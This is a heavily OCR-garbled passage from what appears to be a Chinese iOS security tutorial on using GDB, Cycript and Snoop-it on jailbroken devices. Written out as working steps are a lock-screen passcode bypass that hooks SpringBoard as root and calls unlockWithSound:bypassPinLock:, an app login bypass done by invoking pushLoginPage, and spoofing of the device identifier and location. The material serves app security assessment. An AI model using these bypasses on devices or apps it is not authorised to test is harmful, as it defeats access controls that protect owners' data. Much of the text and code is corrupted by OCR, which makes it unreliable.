common —— Print out the values contained in a Fortran COMMON block 

copying -- Conditions for redistributing copies of GDB 

dcache —- Print information on the dcache performance 

display —- Expressions to display when program stops 

extensions —— ALL filename extensions associated with a source Language 
files -- Names of targets and files being debugged 

float -- Print the status of the floating point unit 

fork -- Help 

frame —— ALL about selected stack frame 

functions -- ALL function names 

gc-references —— List the garbage collectors references for a given address 
gc-roots —— List the garbage collector's shortest unique roots to a given addres 
handle -- What debugger does when program gets various signals 

interpreters -- List the interpreters currently available in gdb 

Line -- Core addresses of the code for a source line 

locals -—— Local variables of current stack frame 

mach-port -— Get info on a specific port 

mach-—ports -—-— Get List of ports in a task 

mach-region -- Get information on mach region at given address 

mach-regions -- Get information on all mach region for the current inferior 
mach-task -- Get info on a specific task 





执行 下 info stack : 


(gdb) inte stack € 
#0 0x3a03feb4 in mach_msg_trap () 
0x3a04004c in mach msg () 
0x31c9c044 in — CFRunLoopServiceMachPort () 
0x31c9ad5e in , CFRunLoopRun () 
0x31c0debc in CFRunLoopRunSpecific () 
0x31c0dd48 in CFRunLoopRunInMode () 
0x357c02ea in GSEventRunModal () 
0x33b23300 in UlApplicationMain () 
0x0007899a in ?? () 
0x00052d48 in ?? () 
(gdb) info thread 
| Thread 1 has turpent state "WAITING" 
Mach port 20x907 (gdb port #0x13@3) 
frame @: 0x3a03feb4 in mach_msg_trap () 
pthread ID: @x3bb41bd@ 
system-wide unique thread id: 0x4ee30 
dispatch queue name: "com.apple.main-thread" 
dispatch queue flags: 0x0 
total user time: 18446744071612478320 
total system time: @ 
scaled cpu usage percentage: @ 
scheduling policy in effect: @x1 
run state: @x3 (WAITING) 
flags: @x@ 
number of seconds that thread has slept: @ 
current priority: 47 
max priority: 63 
_ suspend count: 6. 
(gdb) | 
ee 或 者 disas 命令 。 这 会 给 出 后 续 几 条 指令 的 一 些 汇编 信 


o 我 们 通过 在 — AE d$ d 1 BES RAS HR ME ER ACA ID IR o fo] te X h main 
Re 汇编 ， 使 用 命 





disas 


或 者 


disassemble 


如 下 图 : 


(gdb) disassemble e)— | | | ; 
Dump of assembler code for function mach msg trap: 


0x3a03fea0 <mach_msg_trap+@>: mov r12, sp 

0x3a03fea4 <mach_msg_trap+4>: push {r4, r5, r6, r8} 
0x3a03fea8 <mach_msg_trap+8>: Ldm r12, ir4, r5, r6} 
0x3a03feac <mach_msg_trap+12>: mvn r12, #30 ; 0x1le 
0x3a03febO0 <mach_msg_trap+16>: svc 0x00000080 

0x3a03feb4 «mach msg trap+20>: pop {r4, r5, r6, r8} 
0x3a03feb8 <mach_msg trap+24>: bx Lr 

End of assembler dump. 


| (gdb) disas < 一 
| Dump of assembler code for function mach msg trap: 


| 0x3a03fea0 <mach_msg_trap+@>: mov r12, sp 
| 0x3a03fea4 <mach_msg_trap+4>: push ir4, r5, r6, r8} 
jo <mach_msg_trap+8>: tdm r12, {r4, r5, r6} 
0x3a03feac <mach_msg_trap+12>: mvn r12, #30 ; 0x1le 
| 0x3a031eb0 «mach msg trap*16»: svc 0x00000080 
0x3a03feb4 «mach msg trap*20»2: pop {r4, r5, r6, r8} 
- @x3a@3feb8 <mach_msg_trap+24>: bx ir 
End of assembler dump. 





本 节 我 们 简要 介绍 了 如 何 安 装 和 加 载 GDB， 后 面 会 在 关于 对 iOS 应 用 进行 动态 分 析 的 章节 会 详 
细 介 绍 其 用 法 。 


#4 iOS 设 备 上 的 工具 下 的 更 多 文章 


简介 


Cycript 是 一 个 理解 Objective-C 语 法 的 javascript 解 释 器 ， 这 意味 着 我 们 能 够 在 一 个 命令 中 用 
Objective-C 或 者 javascript， 甚 至 2 者 兼用 。 它 能 够 挂钩 正在 运行 的 进程 ， 能 够 在 运行 时 修改 
应 用 的 很 多 东西 。 


使 用 Cycript 有 如 下 好 处 : 


e 1. 我 们 能 够 挂钩 正在 运行 的 进程 ， 并 且 找 出 正 被 使 用 的 类 信息 ， 例 如 view controllers > A 
部 和 第 3 方 库 ， 其 至 程序 的 delegate 的 名 称 。 

e 2. 对 于 一 个 特定 的 类 ， 例 如 View Controller, App delegate 或 者 任何 其 他 的 类 ， 我 们 能 够 
得 到 所 有 被 使 用 的 方法 名 称 。 

e 3. 我 们 能 够 得 到 所 有 实例 变量 的 名 称 和 在 程序 运行 的 任意 时 刻 实例 变量 的 值 。 

。4 .我 们 能 够 在 运行 时 修改 实例 变量 的 值 。 

5. 我 们 能 够 执行 Method Swizzling， 例 如 替换 一 个 特定 方法 的 实现 。 

e 6. 我 们 可 以 在 运行 时 调用 任意 方法 ， 即 使 这 个 方法 目前 并 不 在 应 用 的 实际 代码 当中 。 


* Cycript 


CEI SCENDE ONO VCMT ore) ， 最 新 版 本 是 0.9.501。 在 iOS 越 狱 设备 上 上， 默认 就 有 
这 个 工具 (参见 这 里 和 这 里 )， 在 iOS 的 命令 行 输入 


cycript 


即 可 。 如 果 你 遇 到 问题 ， 可 以 在 Cydia 中 把 模式 切换 成 开发 者 ， 然 后 搜索 Cycript， 从 Cydia 中 
安 X 一 下 。 


当然 ， 你 直接 从 网 站 上 下 载 到 Mac 上 ， 然 后 在 上 传 到 iOS 设 备 上 也 行 


用 法 举例 

下 面 我 们 介绍 Cycript 的 用 法 : 首先 用 命令 
ps aux 

找到 要 分 析 的 应 用 的 pid， 然 后 用 命 


cycript -pid xxx 


如 下 图 所 示 : 


Tedteki-iPad:/ root# ps aux | grep 'Momo' 
mobile 5582  Á0.0 2.7 466616 26988 ?? Ss 9:01AM 0:04.23 /var/mobile/Applications/EC3F08F0-E781-4EDF-8FEB-3277C369CFBC/MomoChat .app/MomoC 
hat 

root 6134 0.0 0.0 273024 492 5000 R+ 10:43AM 6:00.01 grep Momo 
Tedteki-iPad:/ root# cycript -p 5582 

cy# |UlApplication sharedApplication 


cy# UIApp 

cy# UIApp.applicationIconBadgeNumber 
cy# UIApp. applicationIconBadgeNumber 
cy# a=|UIApplication sharedApplication 


cy# a.applicationIconBadgeNumber 
然后 你 可 以 输入 ObjectiveC 的 语法 ， 比 如 : 
[UIApplication sharedApplication] 


4& Cycrit T : 


y: 


UIApp 和 [UIApplication sharedApplication] 等 效 


你 其 至 可 以 改 提 示 数 字 了 。 此 时 按 Home， 让 应 用 切 到 后 合 ，# 


UIApp.applicationIiconBadgeNumber-100 


效果 如 图 : 


AJ 


` 


N 





后 输入 如 下 的 命令 : 





UIApp.applicationrIconBadgeNumber-200 


效果 如 图 : 
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s 


使 用 Cycript 绕 过 屏幕 解锁 帘 码 


首先 ， 请 确保 你 的 iDS 设 备 设 置 了 锁 屏 移 码 ， 然 后 请 锁 屏 待机 。 


后 在 你 的 Mac 上 ssh 进 你 的 iDS 设 备 ， 


ssh rootQyour ios device ip 


然后 执行 如 下 命令 : 


cycript -p SpringBoard 


然后 输入 : 


SBAwayController.sharedAwayController 


如 下 所 示 : 


Tedteki-iPad:- root# cycript -p SpringBoard 
cy# SBAwayController.sharedAwayController 
#"<SBAwayController: 0xi1d99aaa0» «SBActivationContext: Oxi1d99adfO» activate: deactivate: 


Ee 


我 们 向 要 打印 一 个 类 的 所 有 方法 ， 可 以 使 用 Cycript Tricks Y 89 printMethods 。 





继续 输入 : 


4.5 Cycript 简 介 以 及 绕 过 屏幕 解锁 密码 100 


function printMethods(className) { 
var count - new new Type("I"); 
var methods - class copyMethodList(objc getClass(className), count); 
var methodsArray - []; 
for(var i = 0; i < *count; i++) { 
var method - methods[i]; 
methodsArray.push((selector:method getName(method), implementation:method getImplemen 
j 
free(methods); 
free(count); 
return methodsArray; 





printMethods(SBAwayController ) 


可 以 得 到 如 下 图 所 示 的 信息 : 


Tedteki-iPad:^ root# cycript -p SpringBoard 
cyst printMethods (className 
cy> count Type 
cy> methods = class_copyMethodList(objc_getClass(className), count 
cy> methodsArray 
cy> i i < *count; i+ 
cy> method = methods/i 
cy> methodsArray.push( {selector:method_getName (method imp Lementation:method_getImplementation (method 
cy> 
cy» free(methods 
cy» free(count 
cy> | methodsArray 
cy» 
cy# printMethods |SBAwayController 
selector hasEverBeenLocked) , implementation selector activateLostModeForRemoteLock: ) , implemen 
unlockWithSound: ) , implementation selector frontLocked: animate: automatically: ), implementation 
cancelDimTimer) , implementation selector activeAwayPluginControLler) , implementation 
UI) , implementation selector isAwayPlLuginViewVisible) , implementation selector 
selector handleS LideshowHardwareButton) , implementation selector restartDimTimer 
or preventiIdleS LeepForNumber0fSeconds implementation selector showTestBulletin), implementati 
cameralIsVisible) , implementation selector shouldReturnToCameraAfterCall) , implementation 
rButtonPress:afterCall:dimmed: ) , implementation selector cameralsActive) , implementation 
plementation selector attemptUnlockFromSource implementation selector 
n selector userEventsDidIdle) , implementation selector userEventPresenceTimerExpired 
selector updateNowP LayingInfo: app imp Lementation selector expectsFaceContact) , implementatio 
cancelReturnToCameraAfterCalLl) , implementation selector frontLocked:withAnimation: automatically:disa 
selector relockForButtonPress:afterCall: ), implementation selector 
selector deactivateAlertItem: ) , implementation selector setShowcaseController 
‘(effectiveStatusBarStyle) ,impLementation selector presentShowcaseViewController:revealMode:c 
selector showcase: updateRevea lMode:withBlock: ), implementation selector showcaseWant 





从 图 中 可 以 发 现 这 个 方法 : 


iselector:Qselector(unlockWithSound:bypassPinLock:),implementation:0x10d6e9) 


即 方法 : 


-(void)unlockWithSound:(BOOL)arg4 bypassPinLock:(BOOL)arg2; 


如 下 图 : 


implementation selector cleanupFromPhoneCallIfNeeded) , implementation selector _restartDimTimer: mode imp Lemé 
tation selector interfaceControllingAwayPluginControLller) , implementation selector .disablePluginControllers| 
prLock) , implementation selector _dismissShowcaseImmediately) , implementation selector allowIdleSleep) , implemen 
ation selector finishedDimmingScreen) , implementation selector tearDownCameraUI Immediately) , implementation 
selector _dimTimerFired) , implementation selector unlockAlwaysFullscreenAwayView) , implementation selectd 
r undimScreen) , implementation selector _releaseAwayView) , implementation selector pendOrDeactivateCu 
rentAlertItem) , implementation selector _sendToDeviceLockOwnerIsDisplayingErrorStatus) , implementation selector 
sendToDeviceLockOwnerShouldUseTransparentStatusBar) , implementation selector _sendToDeviceLockOwnerAnimateToEmergencyCall) , impleme 
ation selector _pendAlertitem: ) , implementation selector toggleMediaControls) , implementation selec 
or activateCardItem:animated implementation selector deactivateCardItem implementation selector 
pdateCardItem: ), implementation selector enableLockScreenBundleWithName:activationContext implementation selector 
highestPriorityAwayPluginControLler) , implementation selector disableLockScreenBund LeWithName :deactivationContext: ), implementa 
ion selector disableLockScreenBundleWithName: ) , implementation selector setAlwaysFullscreenAwayP LuginName: ) ,i 
plementation selector nameOfPLuginController: ), implementation selector _activateShowcase: revealMode: ) , imp leme 
ation selector currentTestName) , implementation selector setCurrentTestName: ) , implementation selec 
or _irisOpened) , implementation selector willAnimateToggleDeviceLockWithStyle: toVisibility:withDuration: ), implementation 
selector slidingAlertViewDeactivationAnimationStart: ), implementation selector slidingAlertViewDeactivationAnima 
ionCompleted implementation selector handleCameraPanGesture imp Lementation selector handleCameraTapGestu 
implementation selector allowDismissCameraSystemGesture) , implementation selector handleDismissCameraSyst¢ 
Gesture: ), implementation selector dequeuveAllPendingSuperModalAlertItems) , implementation selector hasSuperModa 
AlertItems) , imp Lenewtetd Ses EDO DIO Tarn OE E ERU Sape ip selector performingAutoUnlock) , implé 
entation selector unlockWithSound:bypassPinLock: ), implementation s lector applicationRequestedDeviceUnlock 
plementation : IO CSO EO UT UCaUU np Conia eo Cao noteResetRestoreStateChanged) , implementation 
selector _photoLibraryChanged) , implementation selector shouldShowS LideshowButton) , implementation se 
ector willALLlow0therLockBarsToUnLock) , implementation selector printLockLog) , implementation selector 
remoteLock implementation selector isLockedAndUndimmed) . implementation selector isLockedAndInactive) , implem¢ 
tation selector isActivatingBackLlightForUnlock) , implementation selector prepareToReturnToCameraFromCall) , imp 
ementation selector awayBulletinControllerIsActive) , implementation selector restoreFromSavedBulletinControlle 
implementation selector attemptDeviceUnlockWithPassword: lockViewOwner implementation selector hand LeReques 
edAlbumArt implementation selector emergencyCallWasDisplayed) , implementation selector emergencyCallWasRemo 
ed). implementation selector prepareUIForAssistantPopoverWithCompletion imp Lementation selector updateUIForAg 
sistantPopoverRotationToOrientation:withDuration implementation selector cleanupUIForAssistantPopoverDismissalAnimated imp Leme 
ation selector currentAlertItem) , implementation selector noteAlertSheetWasRep laced: withAlertSheet: ) , implemen 
ation selector wantsToHandleAlert implementation selector updateInCallUL) , implementation selecto 
toggleShowsIMEIandICCID: ) , implementation selector exitLostModelfNecessary) , implementation selector 
isInLostMode) , implementation selector defaultContentRegionForPluginController:withOrientation implementation selector 
startLockSliderAnimations) implementation selector stopLockSliderAnimations) , implementation selector 
updateLockSLider) , implementation selector chargingViewHasFadedOut) , implementation selector statusBarStyle) ,i 
plementation selector hand LeKeyEvent implementation selector isLocked) , implementation selector 
animationDidStop:finished implementation selector lock) , implementation selector setLocked imp Leme 
tation selector deactivate) , implementation selector activate) , implementation selector ha 
rdwareKeyboardAvailabilityChanged) ,implementation selector takePicture) , implementation selector isMakingEmerg¢ 
cyCall) , implementation selector userEventOccurred) , implementation selector preventIdleSleep) , implementation 





在 cycript 中 的 输入 : 


[SBAwayController.sharedAwayController unlockWithSound:1 bypassPinLock:1] 
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法 。 


#4 iOS 设 备 上 的 工具 下 的 更 多 文章 


9| 8 


在 前 面 的 文章 中 我 们 介绍 了 如 何 用 class-dump-z 来 导出 iOS 应 用 的 类 信息 ， 如 何 利 用 Cycript 挂 
钧 进程 、 执 行 运行 dudit —— > 用 gdb 分 析 app 的 流程 。 然 而， 可 能 有 更 好 的 


Zr X 能 够 做 这 文 些 事 。 能 够 有 一 个 工具 能 够 做 所 有 这 Ax 月 A Ht ELA E aS 更 好 的 展示 这 文 些 信息 AS 
就 太 好 了 。 
Snoop-it 就 是 这 样 一 个 tool。 它 允许 我 们 进行 运行 时 分 析 和 对 iOS 应 用 进行 黑 盒 安全 评估 。 它 


提供 一 个 非常 简洁 的 Web 界面 。 在 写本 文 的 时 候 ， ee -it 还 没 正式 发 布 ， posi T 
件 ， 他 们 非常 友好 的 提供 给 我 一 个 beta 版 本 做 测试 。 你 可 以 到 它 的 官网 查看 或 者 你 可 以 
在 Twitter 上 关注 作者 。 


Snoop-it 提 供 的 功能 可 以 从 对 其 官方 地 址 的 截图 看 到 。 


Features 
Monitoring 


+ File system access (print data protection classes) 

* Keychain access 

s HTTP(S) connections (NSURLConnection) 

* Access to sensitive API (address book, photos etc.) 
+ Debug outputs (NSLog) 

+ Tracing App internals (objc_msgSend) 


Analysis/Manipulation 


* Fake hardware identifier (UDID, Wireless MAC, etc.) 

+ Fake location/GPS data 

+ Explore and force display of available ViewController 
+ List custom URL schemes 

e List available Objective-C classes, objects and methods 
* Invoke arbitrary methods at runtime 

* Bypass basic jailbreak detection mechanisms 


Other 


s Simple installation and configuration 

* Easy to use graphical user interface 

s Plenty of filter and search options 

+ Detailed description of the XML-RPC web service interface 


JE 


AX 


X 


(备注 : 目前 已 经 可 以 通过 在 Cydia 上 添加 源 、 然 后 直接 下 载 安装 了 。) 要 安装 Snoop-it 到 你 
的 设备 上 。 你 不 得 不 下 载 deb 包 ， 然 后 用 sftp 上 传 到 你 的 设备 上 。 在 命令 行 下 用 命令 dpkg -i 
[packageName] 来 安装 Snoop-it 到 你 的 设备 上 。 一 旦 安装 完成 ， 重 启 你 的 设备 。 











Last login: Tue Jul 16 15:19:22 on ttys8ee 

Prateeks-MacBook-Pro:Desktop prateekgianchandani$ ssh rootal8.0.1.798 

rootgl8.8.1.78's password: 

Prateeks-iPod:^- root# dpkg -i Snoop-it betaB.deb 

(Reading database ... 7394 files and directories currently installed.) 
| Preparing to replace de.nesolabs.snoopit 8.98.56 (using Snoop-it betaB.deb) ... 
|Unpacking replacement de.nesolabs.snoopit ... 

Setting up de.nesolabs.snoopit (8.9.8) ... 


| NOTE: Please terminate and restart the 5noop-it Configuration App as well as all Apps Snmoop-it is currently injected 
to. 
Prateeks-iPod:- root# p 


一 旦 安装 完成 ， 你 会 看 到 Snoop-it 的 图 标 ， 点 击 它 ， 你 可 以 看 到 如 下 的 界面 。 
iPod = 2:12 PM Cm 


Applications 
Injection 
Apps to Analyze: 


com.apple.mobilecal 


Select System/Cydia Apps 


Select App Store Apps 


Applications 





到 设置 中 按 你 所 需 配置 。 在 这 里 ， 我 们 选择 端口 为 12345， 并 且 关 闭 验证 。 如 果 你 所 在 的 网 络 
有 许多 其 他 用 户 ， 或 者 比较 调皮 的 用 户 ， 建 议 你 还 是 开 居 验证 。 


iOS 安全 Wiki 


iPod = 2:20 PM 
Settings 





Web Interface - 


http://Prateeks-iPod.local:12345/ 
http://10.0.1.79:12345/ 





Port 


Authentication 

















Username | snoop-it 





Password | snoop-it 


Settings 





IÆ > M Snoop-itte 4# 89 3,3E 4T A Snoop-itig Webi t » ARIK > Wht 
Æ : http://10.0.1.79:12345 


SNOOP-IT 


BT HIIG THREW LARI 


1. App Selection 

Pirar tha Test ran, Gnoop-£ Fu Ge: bue conibgunad property. For Ihe. ou rad Bo gable tha 
Ana ish want io analyze uung tha "Snoon-E Configuration Ags”, Wirin the Aakers’ 
tan yo wt Abia to chaia el "v ninbie ne i Ager or Appa raised tom: tha 


aci Ano Ann Stern 


Example: Tap on 'Select Ano Store Apps" 





你 将 看 到 这 个 Web 界 面 。 如 果 你 读 一 下 ， 会 发 现 它 让 你 在 Snoop-it 中 选择 你 要 分 析 的 应 用 ， 在 
应 用 中 打开 要 分 析 的 应 用 ， 然 后 刷新 这 个 Web 界 面 。 现 在 回 到 Snoop-it， 选 择 我 们 要 分 析 的 
应 用 ， 在 我 这 ， 我 将 要 选择 MethodSwizzlingDemo 应 用 ， 和 上 一 篇 文章 用 的 应 用 一 样 。 


f C C V ~ pw it A ye E f LE 
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iOS 24 Wiki 


Pod = 2:29 PM 





Applications App Store apps 





com.nachensoft.GeoDolt 
Gmail 
== com.google.Gmail 


L3 iBooks 
com.apple.iBooks 


imagePicker 
com.fueled.imagePicker 


| T | JackThreads 


com.thrillist.jackthreadsapp 
jsa 
company.jsa 
kjnk 
Prateek.kjnk 
MethodSwizzlingDemo 
Prateek.MethodSwizzlingDemo 
| NASA 
| gov.nasa.NASA 
NASA TV 


Th BARD YY pz] C28 412913 RAS EBT 6 ^ ILA Bt Snoop-it4y Web t » 


Snoop-it 


MethodSwizzlingDemo — |," Connection Status: @ 


[E] Objective-C Classes 
[-] View Controller 

[£] URL Schemes 

日 ( Runtime Manipulation 
Hardware Identifier 
Fake Location 


[E] Method Tracing 








la 


Bundle Identifier: Prateek.MethodSwizzlingDemo 
Display Name: MethodSwizzlingDemo 
Version: | 1.0 
Build Version: | 1.0 
Has PIE: true 





& Debug Report 


正如 你 看 到 的 ， 现 在 你 有 一 个 很 漂亮 的 界面 ， 现 在 你 可 以 对 这 个 应 用 进行 详尽 的 安全 评估 
Fo 


4.6 Snoop-it 简 介 106 


分 析 


在 左边 ， 在 Analysis 下 面 ， 点 击 Objective-C Classes。 在 右边 你 就 看 到 所 有 的 类 信息 ， 比 如 属 
aan 法 名 称 。 


DV 

















Á ” Snoop-it MethodSwizzlingDemo |} Connection Status: @ 
日 (J Monitoring Home Objective-C Classes 
|) Filesystem 
[g) Keychain Refresh Tree No method selected 
[E] Network 日 Qi) NsObject I/Classtype: App-Class 
|] Sensitive API 日 @ UResponder HInstances: 0x128760 à 
(interface ViewController : UI ViewController { 
日 加 Analysis g @uview ‘instance Variables 
Objective-C Classes = UlStatusBarltemVi i ; 
[m] Objec x 2 — UlTextField* passwordTextField; 
[-] View Controller m UlStatusBarCustomltemView ) UlTextField* usernameTextField; 
[E] URL Schemes 日 @ UlviewController //Properties 
E ES ViewControlie @property (retain,nonatomic) UITextField* usernameTextField; i= usernameTextField 
a 4 i m Ə Jein @property (retain,nonatomic) UlTextField* passwordTextField; // = passwordTextField 
Hardware Identifier (=) AppDelegate //Methods 
[E] Fake Location @ SimpleTest 
3 Method Tracing @ LsstatusBarltem - (bool) validateLogin; 
m LSStatusBarServer - (void) pushLoginPage; 
@ LsstatusBarClient - (void) loginTapped:(id)arg0; 
@ VNCBridge 


- (void) login2Tapped:(id)argO; 
- (void) setPasswordTextField: (id)argO; 
- (void) setUsernameTextField: (id)argO; 


日 @ uistatusBaritem 
m UlStatusBarCustomltem 


- (void) didReceiveMemory Warning; 
- (void) viewDidLoad; 
- (id) passwordTextField; 
- (id) usernameTextField; 
- (void) dealloc; 
- (id) init; 
@end 


Debug Report Search : 


橘子 色 的 代表 有 实例 的 类 。 例 如 ， 当 你 把 鼠标 从 ViewController 的 类 上 面 移 动 的 时 候 ， 你 会 看 
到 一 个 类 实例 BE. o 


日 @) ulviewController 
@ ViewController 
ies) AppDelegate roe | 
ud sSimpleT est 


ats 


类 似 的 ， 那 可 以 看 到 AppDelegate 的 方法 和 属性 。 





Üx128760 


Home Objective-C Classes View Controller 


Refresh Tree No method selected 


日 Qi Nsobject //Classtype: App-Class 
日 @ UlResponder //instances: 0x17aa80 rion 
(Qinterface AppDelegate : UlResponder<U!ApplicationDelegate> //Protocols { 
g @ uiview I/Instance Variables 
日 W UlStatusBarltemView 


) UlWindow* window; 
@ UlstatusBarCustomitemView 


//Properties 
= - UlViewController @property (retaininonatomic) UIWindow* window; // = window 
@ ViewController /Methods 
C) AppDelegate 
"m SimpleTest ~ (d) window; 
9 LSStatusBarltem - (void) applicationWillTerminate: (id )argO; 
@ LssiatusBarServer - (void) applicationDidBecomeActive:(id)arg0; 
@ LsstatusBarClient - (void) applicationWillResignActive:(id)arg0; 
9 VNCBridge - (void) applicationDidEnterBackground: (id)argO; 
日 x9 UlStatusBarltem - (void) applicationWillEnterForeground:(id)argO; 
@ UistatusBarCustomitem - (bool) application: (id)jargO didFinishLaunchingWithOptions:(id)arg1; 
- (void) setWindow:(id)argO; 
- (void) dealloc; 
- (id) init; 
@end 


© | View Controller kw > 4&4] "T 438 33 Snoop-it 78 A AL: 7 x 6 E S a and 
Invoke。 正 如 我 们 在 上 一 篇 文 草 中 提 到 的 那样 ， 使 用 这 个 方法 ， 我 们 能 够 绕 过 这 个 应 用 的 验 
TE © 


selected Method: - (void) pushLoginPage; 


!/Classtype: App-Class 

‘instances: 0x128760 

(Interface ViewController : UlViewController { 
‘instance Variables 


UlTextField* passwordTextField; 
) UlTextField* usernameTextField; 
//Properties 
(property (retaininonatomic) Ul TextField* usernameTextField; // = usernameTextField 
(property (retaininonatomic) UlTextField* passwordTextField; //  passwordTextField 
//Methods 


bool) validateLogin; 


-{ 
(9; Diss pushLoginPage:; 
- iv 


- (void) login2 Tapped: {id)arg0; 

- (void) setPasswordTextField: (id)argO; 

- (void) setUsernameTextField:(id jarg0; 

- (void) didReceiveMemoryWarning; 

- (void) viewDidLoad; 

- (id) passwordTextField: 

- (id) usernameTextField; 
- (void) dealloc; 

- (id) init; 


(end 


iOS 4 Wiki 


选择 对 应 的 实例 (这 里 只 有 1 个 实例 ， 但 是 如 果 view controller 被 复 用 ， 那 么 就 可 能 会 有 多 个 
实例 ) ， 点 击 Invoke Method. 


| Setup 
Method: = (void) pushLoginPage; 


Setup 


Select Instance : |0x128760 v 











Irvoke Method 





这 样 我 们 就 调用 了 对 应 的 方法 ， 并 且 绕 过 了 程序 的 验证 。 


iPod ? 4:28 PM G um 






Welcome, admin 
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Snoop-it 的 另 一 个 牛 逼 功能 是 我 们 可 以 切换 到 任意 的 view controller。 例 如 ， 在 左 


下 面 ， 选 择 View Controller > 3& 


上 面 来 决定 点 击 Close/Hide View Controller 


Oo 


ID: 


ES c Monitoring Home Objective-C Classes View Controller 
[=] Filesystem List of all available ViewControllers 
国 Keychain 日 四 UIWindow 
|=) Network 


& (JJ UlNavigationController 
辐 Sensitive API 
日 中 Analysis 


|] Objective-C Classes 


[s] ViewController 
| UlViewController 
日 四 UlWindow 
"| View Controller 


— 


[s] ViewController 
| |=] URL Schemes 

日 中 Runtime Manipulation 
| Hardware Identifier 


|=) Fake Location 





|] Method Tracing 


你 能 够 通过 点 击 Reset display 返 回 。 
起 来 。 我 太 喜 欢 Snoop-it 的 这 个 功能 了 。 


运行 时 修改 


Snoop-it 支 持 多 种 运行 时 修改 ， 


AJ 大 大 


等 等 。 


这 个 功能 能 够 让 我 们 把 view controller 与 对 应 的 view 关 联 


包括 修改 你 的 硬件 标识 符 


Class Name: 
Title: 

Displayed Modal: 
Type: 
canBeDismissed: 
Visible: 

VC Index: 





Display Controller 





W 89 Analysis 


4% 4: ib 4) view controller > A/G & t Display Controller. 你 就 能 
够 切换 到 那个 view controller。 你 也 可 以 根据 这 个 View Controller TE 7 


妨 一 个 View controller 


0x128760 


ViewController 


false 
UlViewController 
false 

true 

0 


Reset Display 


于 比如 Mac 地 址 ，UDID， 设 备 模型 号 





€ Snoop-it 


= c Monitoring Home Hardware Identifier 


司 Filesystem 

司 Keychain 

|] Network 

|=] Sensitive API 

C (J Analysis 

|=) Objective-C Classes 
|=] View Controller 

|] URL Schemes 

[3 中 Runtime Manipulation 

| | Hardware Identifier 
|] Fake Location 


|=] Method Tracing 





你 还 
用 o 


可 以 弄 个 假 地 址 。 


MethodSwizzlingDemo |, 1 


Real UDID: 3ea8ee4fd004514e8b96e4842010bedbe0108d18 


Real Wifi Mac: | 283737db4215 

Real Device Model: | iPod touch 
Fake UDID: 
Fake Wifi Mac: 


Fake Device Model: 


UDID : 


Mac- 
Address : 


Model : 


Save 


Reset 


Random UDID 


Random Mac-Addre 


这 个 对 于 那些 利用 GeoEncrytion 来 保护 它们 数据 的 应 用 来 说 非常 有 


iOS 4 Wiki 


























































& (J Monitoring Home | Hardware Identifier [3 | Fake Location £ 
[E] Filesystem Address : Search Address || Set Address | Reset active: @ 
[E] Keychain 
ME 
anew 
[-] Sensitive API Lithuania 
i í Kaunas 
& (jJ Analysis aS pet L s: o a 
c Kingdom = 9 o 
司 Objective-C Classes + Drie \ Vilnids Minsk 
: 2 | Leeds I 
[E] View Controller l M7 y^ mes - Hamburg 9? 
€ X = z z " 
[E] URL Schemes hs y dv h R Bialystok Bel 
rpool o arus 
日 (J Runtime Manipulation - inam Rnsterdam Bremen f Poland 
Ee “tnt 
[E] Hardware Identifier | Y Netherlands t [es Poznan OWarsaw 










PB IP, 
Bristol ^ London 
p Opa 


. È) Fake Location — 


[E] Method Tracing 









19} ' 
OR Lodz Lublin 
2 Wroclaw 
j£"89n" Germany 6 i 















Prague Krakow 






i 
Czech Republic — BN 
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Y Slovakia Dnipropet 
, Bratislava P o 
; i | ò 
Nantes - Budapest e oldova ETN gro 
: j Hur Cluj-Napoca o 
NS Ta Chis P 一 
| A oy) — 
Romania f 4 


f 
Sevastopol! 






Bucharest 
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Zaragoza 
- ; to. 4 Mea Barcelonao 
TOI O : 





Map data ©2013 Basarsoft, FEST (&2008 Goggle: -Mapa GiSrael, , ORION-ME, basado en BCN IGN España - Terms of Use 











， 你 还 可 以 跟踪 方法 和 系统 调用 的 流程 。 请 注意 ， 你 需要 每 隔 几 秒 在 方法 调用 后 点 击 最 
pantaiada 。 请 注意 ， 因 为 我 们 在 beta 版 本 上 测试 ， 可 能 作者 会 改变 这 个 行为 使 
得 我 们 不 必 每 隔 几 秒 就 点 击 刷 新 按钮 。 对 有 些 用 户 来 说 ， 这些 信息 可 能 大 多 ， 但 是 对 于 像 我 

经 开发 过 多 年 iOS 程 序 的 人 来 说 这 些 信 息 是 相当 简单 直接 的 

























































































r Snoop-it MethodSwizzingDemo |,’ | Connection Status: @ 
日 加 Monitoring Home | Hardware Identifier E | Fake Location (3 | Method Tracing (3 
[E] Filesystem Tracing Cache Size — — 一 Download Log Files 
[E] Keychain on/off | Refresh Cache Size: 250 | Set Cache Size Download Current Logfile | Old Log-Files : |x | | Download | | Delete | 
[E] Network 
B Sensitive API Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesMoved:withEvent:], args: , <0x178530> 
B (Analysis Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , «0x178530» 
B Objective-C Classes Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesMoved:withEvent:], args: , <0x178530> 
B den Codici Wed Jul 17 16:35:00 2013 (Thread 0): + [LSStatusBarClient(0xe5838) sharedinstance] 
[E] URL Schemes Wed Jul 17 16:35:00 2013 (Thread 0): - [LSStatusBarClient(0x177b70) titleStringAtIndex:], args: 2147483647 
日 a Runtime Manipulation Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , <0x178530> 
B Hardware identilier Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesMoved:withEvent:], args: , <0x178530> 
B Fasto Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , <0x178530> 
[E] Method Tracing Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesMoved:withEvent:], args: , «0x178530» 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , «0x178530» 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesMoved:withEvent:], args: , <0x178530> 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , «0x178530» 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x172280) touchesMoved:withEvent;], args: , <0x178530> 
